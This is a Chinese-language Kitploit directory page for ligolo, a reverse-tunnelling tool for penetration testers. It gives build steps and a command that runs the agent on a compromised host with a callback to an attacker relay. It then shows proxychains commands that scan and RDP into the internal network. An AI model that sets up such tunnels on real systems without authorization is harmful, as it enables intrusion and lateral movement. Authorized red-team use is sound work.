Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ligolo — 为渗透测试者简化反向隧道,由渗透测试者打造 https://sysdream.com/ | Kitploit
工具/GitHubGitHub/sysdream/ligolo
横向移动渗透测试红队
GitHubsysdream/ligolo

ligolo

为渗透测试者简化反向隧道,由渗透测试者打造 https://sysdream.com/

查看仓库
1.8k22716年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Ligolo : 渗透测试者打造的简易反向隧道工具

forthebadge forthebadge

Ligolo

目录

  • 引言
  • 使用场景
  • 快速演示
  • 性能
  • 使用方法
    • 设置/编译
    • 如何使用?
    • 太长不看
    • 选项
  • 功能特点
  • 待办事项
  • 许可证
  • 致谢

引言

Ligolo 是一款简单且轻量的工具,用于通过反向连接安全地建立 SOCKS5 或 TCP 隧道(使用椭圆曲线 TLS 证书)。

它类似于 Meterpreter 配合 Autoroute + Socks4a,但更稳定、更快速。

使用场景

你在外部审计期间攻陷了一台 Windows / Linux / Mac 服务器。该服务器位于局域网内部,而你需要与该网络上的其他机器建立连接。

Ligolo 可以设置隧道以访问内部服务器的资源。

快速演示

使用 Proxychains 中转 RDP 连接(WAN)。

RDP

性能

以下是两台 100mb/s 主机(ligolo / localrelay)之间的速度测试截图。性能可能因系统和网络配置而异。

Speedtest

使用方法

设置/编译

确保 Go 已安装并能正常工作。

  1. 获取 Ligolo 及其依赖
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. 生成自签名 TLS 证书(将放置在 certs 文件夹中)
root@kitploit:~
make certs TLS_HOST=example.com

注意:你也可以使用自己的证书,只需在调用 build 时使用 TLS_CERT make 选项。例如:make build-all TLS_CERT=certs/mycert.pem。

  1. 编译
  • 3.1. 针对所有架构
root@kitploit:~
make build-all
  • 3.2. (或)针对当前架构
root@kitploit:~
make build

如何使用?

Ligolo 由两个模块组成:

  • localrelay
  • ligolo

Localrelay 应在控制服务器(攻击者服务器)上运行。

Ligolo 是在目标计算机上运行的程序。

对于 localrelay,你可以保留默认选项。它将在所有接口上监听端口 5555,并等待来自 ligolo 的连接(-relayserver 参数)。

对于 ligolo,你必须使用 -relayserver ip:port 参数指定中继服务器(或你的攻击服务器)的 IP 地址。

你可以使用 -h 选项查看帮助。

一旦 Ligolo 和 LocalRelay 之间建立连接,中继服务器上就会在 TCP 端口 1080 上设置一个 SOCKS5 代理(你可以使用 -localserver 选项更改 TCP 地址/端口)。

之后,你只需使用你喜欢的工具(例如 Proxychains)即可探索客户端的 LAN 网络。

太长不看

在你的攻击服务器上:

root@kitploit:~
./bin/localrelay_linux_amd64

在被攻陷的主机上:

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

连接建立后,在 ProxyChains 配置文件(攻击服务器上)中设置以下参数:

root@kitploit:~
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

开始使用:

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

选项

Localrelay 选项:

root@kitploit:~
Usage of localrelay:
  -certfile string
    	TLS 服务器证书(默认 "certs/server.crt")
  -keyfile string
    	TLS 服务器密钥(默认 "certs/server.key")
  -localserver string
    	本地服务器地址(你的 proxychains 参数)(默认 "127.0.0.1:1080")
  -relayserver string
    	中继服务器监听地址(回连地址)(默认 "0.0.0.0:5555")

Ligolo 选项:

root@kitploit:~
Usage of ligolo:
  -autorestart
    	发生异常时自动重连
  -relayserver string
    	中继服务器(回连地址)(默认 "127.0.0.1:5555")
  -skipverify
    	跳过 TLS 证书绑定验证
  -targetserver string
    	目标服务器(如 RDP 客户端、SSH 服务器等)——未指定时,Ligolo 启动 SOCKS5 代理服务器

功能特点

  • TLS 1.3 隧道,支持证书绑定
  • 多平台(Windows / Linux / Mac / ...)
  • 多路复用(所有流量共享一条 TCP 连接)
  • SOCKS5 代理或简单中继

待办事项

  • 更好的超时处理
  • SOCKS5 UDP 支持
  • 实现 mTLS

许可证

GNU 通用公共许可证 v3.0(详见 LICENSING)。

致谢

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

下载工具